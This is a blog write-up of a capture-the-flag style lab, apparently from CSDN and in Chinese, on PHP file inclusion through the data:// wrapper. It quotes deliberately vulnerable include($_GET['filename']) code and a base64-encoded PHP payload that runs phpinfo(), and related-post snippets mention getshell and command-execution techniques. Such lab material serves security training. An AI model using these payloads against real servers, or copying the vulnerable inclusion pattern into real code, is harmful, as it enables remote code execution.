iwebsec靶场文件包含漏洞-data://伪协议

最新推荐文章于 2024-04-20 21:37:31 发布

古木木木木木

最新推荐文章于 2024-04-20 21:37:31 发布

阅读量217

点赞数

文章标签： web安全安全

本文链接：https://blog.csdn.net/qq_56041380/article/details/130033804

版权

从PHP5.2.0起，数据流封装器开始有效，主要用于数据流的读取。如果传入的数据是PHP代码，就会执行任意代码。

使用方法

data://text/pain;base64,xxxxxx(Base64编码后的数据)

源码分析

<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
	
?>

这也是一个简单的文件包含

我们输入的数据为(+进行url编码为%2b)

<?php phpinfo();?>
#编码后
PD9waHAgcGhwaW5mbygpOz8+

这样就用data://伪协议执行了phpinfo函数

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

古木木木木木

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
iwebsec靶场文件包含漏洞-data://伪协议

从PHP5.2.0起，数据流封装器开始有效，主要用于数据流的读取。如果传入的数据是PHP代码，就会执行任意代码。
复制链接

扫一扫

vuInhub靶场实战系列-prime:2

06-08

vuInhub靶场实战系列-prime:2

PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)

01-08

这就是 upload-labs（文件上传漏洞靶场）的价值所在。 upload-labs 是一款开源的练习 web 漏洞的靶场工具，用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...

参与评论您还未登录，请先登录后发表或查看评论

PHP常用伪协议

L1ni01

09-17

225

一.(file://协议) PHP.ini： file:// 协议在双off的情况下也可以正常使用； allow_url_fopen ：off/on allow_url_include：off/on file:// 用于访问本地文件系统，在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响 file:// [文件的绝对路径和文件名] 例如 http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WW

文件包含漏洞1 | iwebsec

weixin_52116519的博客

03-06

869

正是这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。文件包含函数的参数没有经过过滤，可以被攻击者控制，包含其他恶意文件，导致了执行恶意的代码。PHP的文件包含可以直接执行包含文件的代码，包含的文件格式不受限制（无论是txt、图片文件还是远程URL，全都作为PHP代码执行），只要能正常执行即可。这个文件是我们通过文件上传点上传的，但是无法解析，我们可以利用这里的文件包含漏洞解析。的文件包含漏洞，大多出现在模块加载、模板加载和cache调用的地方。文件，写入如下代码，即01环境的代码。

iwebsec靶场文件包含漏洞通关笔记5-远程文件包含绕过

mooyuan的博客

04-20

1243

前言。

文件包含漏洞2 | iwebsec

weixin_52116519的博客

03-12

743

服务器可以过滤掉执行文件包含操作的符号，例如：\，// 等，以及 php 伪协议常用字符，例如input，output，filter 等，将这些字符进行有效过滤，可以减少恶意文件操作的可能。远程文件包含（remote file include，RFI）是指包含文件的位置并不在本地服务器，而是通过URL的形式包含到其他服务器上的文件，以及执行文件中的恶意代码。：通过可控的session值，传入恶意代码，找到session文件地址、文件名，通过文件包含漏洞包含session文件，达到getshell的目的。

命令执行漏洞 | iwebsec

weixin_52116519的博客

02-26

2204

应用程序有时需要调用一些执行系统命令的函数，如在PHP中，使用system、exec、shell_exec、passthru、popen、proc_popen等函数执行系统命令。当黑客能控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常的命令中，从而造成命令执行攻击，这就是命令执行漏洞。【摘自《web安全攻防》】管道符作用举例直接执行后面的命令。||前面执行的命令执行出错才执行后面的语句。前面的语句无论真假都可以执行后面的语句。（无条件执行后面的语句，推荐使用。&&

文件包含漏洞原理与实践

yz_weixiao的博客

02-20

258

文件包含漏洞常出现在「PHP语言」中。PHP为了提高「代码复用性」，提供了文件包含函数include()和require()，被包含的文件内容会被当做代码来执行。就像造轮子一样：把「重复使用」的一段代码，单独写到一个文件里，再用文件包含函数来包含这个文件。为了灵活的包含文件，一些程序员会把文件名通过「参数」的形式传递给文件包含函数。当传递文件名的参数可以被用户「修改」时，用户就可以包含任意文件，而文件中的代码就会被服务器执行，这就造成了文件包含漏洞。

vuInhub靶场实战系列-prime:1

最新发布

06-05

vuInhub靶场实战系列-prime:1

渗透测试上传漏洞经典靶场学习-upload-labs

07-02

渗透测试上传漏洞经典靶场学习-upload-labs

CVE-2020-13933 靶场： shiro 认证绕过漏洞.zip

01-16

靶场，是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中，靶场扮演着重要的角色，尤其是在网络安全领域，靶场成为培养和提高安全专业人员技能的重要平台。首先，...

iwebsec靶场（文件包含）

果粒程

03-02

1123

iwebsec靶场（文件包含）

【iwebsec靶场文件包含漏洞个人专用结题记录】（记录自己不了解的知识点）

qq_63761746的博客

03-27

175

为什么会有文件包含漏洞?什么是文件包含漏洞?

iwebsec 文件包含篇（已完结）

qq_60829702的博客

03-30

1851

iwebsec 文件包含，详细分析，持续更新

iwebsec靶场数据库漏洞通关1-MySQL数据库漏洞

mooyuan的博客

11-24

986

iwebsec靶场的数据库漏洞第一项内容为MySQL漏洞渗透，如下所示我们可以使用kali的msf模块对其进行渗透。

php伪协议

weixin_60719780的博客

01-27

4285

PHP伪协议，也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。

Web安全之文件包含漏洞

我不是大牛

07-04

2780

什么是文件包含程序开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件。而无需再次编写，这种文件调用的过程一般被称为文件包含。例如：include “conn.php” PHP中常见包含文件函数 include() 当使用该函数包含文件时，只有代码执行到include()函数时才将文件包含进来，发生错误时之给出一个警告，继续向下执行。 include_once()...

Web漏洞之文件包含漏洞

zkaqlaoniao的博客

10-28

6873

iwebsec靶场搭建

07-28

iwebsec靶场是一个漏洞集成容器，其中集成了大量的web漏洞环境，包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场，可以使用docker来运行容器。...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交